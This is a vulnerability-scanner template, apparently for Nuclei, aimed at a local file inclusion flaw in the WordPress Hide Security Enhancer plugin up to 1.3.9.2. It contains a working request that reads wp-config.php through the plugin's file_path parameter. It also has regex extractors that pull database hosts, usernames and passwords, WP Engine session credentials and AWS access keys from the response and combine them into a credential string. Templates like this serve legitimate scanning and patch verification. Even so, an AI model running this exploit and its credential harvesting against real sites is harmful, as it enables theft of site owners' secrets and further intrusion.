id: hide-security-enhancer-lfi

info:
  name: WordPress Hide Security Enhancer 1.3.9.2 Local File Inclusion
  author: dhiyaneshDK
  severity: high
  description: WordPress Hide Security Enhancer version 1.3.9.2 or less is susceptible to a local file inclusion vulnerability which could allow malicious visitors to download any file in the installation.
  reference:
    - https://secupress.me/blog/arbitrary-file-download-vulnerability-in-wp-hide-security-enhancer-1-3-9-2/
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:N
    cvss-score: 8.6
    cwe-id: CWE-22
  remediation: Upgrade to version 1.4 or later.
  tags: wordpress,wp-plugin,lfi,wp

requests:
  - method: GET
    path:
      - '{{BaseURL}}/wp-content/plugins/wp-hide-security-enhancer/router/file-process.php?action=style-clean&file_path=/wp-config.php'

    headers:
      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36

    stop-at-first-match: true
    matchers:
      - type: dsl
        dsl:
        - status_code==200 && contains(body,"WPENGINE_ACCOUNT")
        - status_code==200 && contains(body,"DB_PASSWORD")
        - status_code==200 && contains(body,"DB_PASS")
        - status_code==200 && contains(body,"PASSWD")
        - status_code==200 && contains(body,"db_pwd")
        - status_code==200 && contains(body,'/** MySQL database username */') && contains(body,'define(')        
        condition: or            

  #===EXTRACT-PART===#

    extractors:
      - type: regex
        part: body
        name: db_host        
        group: 6
        internal: true
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(HOST|HOSTNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_name        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(NAME|DATABASE)['\"](.*?).*?['\"](.*?)['\"]"          
      - type: regex
        part: body
        name: db_user        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(USER|USERNAME)['\"](.*?).*?['\"](.*?)['\"]"
      - type: regex
        part: body
        name: db_password        
        group: 6
        internal: true        
        regex:
          - "define\\((.*?)['\"](.*?)(MYSQL|DB)_(PASS|PASSWORD)['\"](.*?).*?['\"](.*?)['\"]"

      - type: regex
        part: body
        name: db_host
        group: 1  
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_HOST\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_user
        group: 1
        internal: true        
        regex:
          - "(?mi)['\"]WPENGINE_SESSION_DB_USERNAME\\s*['\"][=:]['\"]\\s*(.*?)\\,"
      - type: regex
        part: body
        name: db_password
        group: 1
        internal: true
        regex:   
          - "(?mi)['\"]WPENGINE_SESSION_DB_PASSWORD\\s*['\"][=:]['\"]\\s*(.*?)\\,"             

      - type: regex
        part: body
        name: aws_key
        regex:
          - "((A3T[A-Z0-9]|AKIA|AGPA|AROA|AIPA|ANPA|ANVA|ASIA)[A-Z0-9]{16})"

      - type: regex
        part: body
        name: aws_key1
        regex:
          - (?i)(['\"]access-key-id['\"]\\s*=>\\s*['\"](AKIA[0-9A-Z]{16})['\"]|['\"]secret-access-key['\"]\\s*=>\\s*['\"]([A-Za-z0-9\/+]{40})['\"])

      - type: dsl  # type of the extractor
        name: db_cred
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + "3306" + "|DB_USERNAME=" + db_user + "|DB_PASSWORD=" + db_password'

      - type: dsl
        name: db_original
        dsl:
          - '"DB_HOST=" + db_host + "|DB_PORT=" + db_port + "|DB_USERNAME=" +  db_user + "|DB_PASSWORD=" + db_password'